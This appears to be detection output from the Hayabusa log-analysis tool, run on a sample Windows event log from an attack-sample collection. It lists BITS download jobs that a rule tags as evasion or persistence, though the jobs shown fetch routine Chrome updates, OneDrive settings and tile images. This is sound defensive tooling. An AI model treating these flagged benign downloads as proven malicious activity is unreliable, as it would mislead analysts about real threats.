https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe | URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 
20:03:05.093 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push 
Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:36:30.267 
+09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
+2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,info,Evas | 
Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe | URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: 
Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe | URL: 
http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 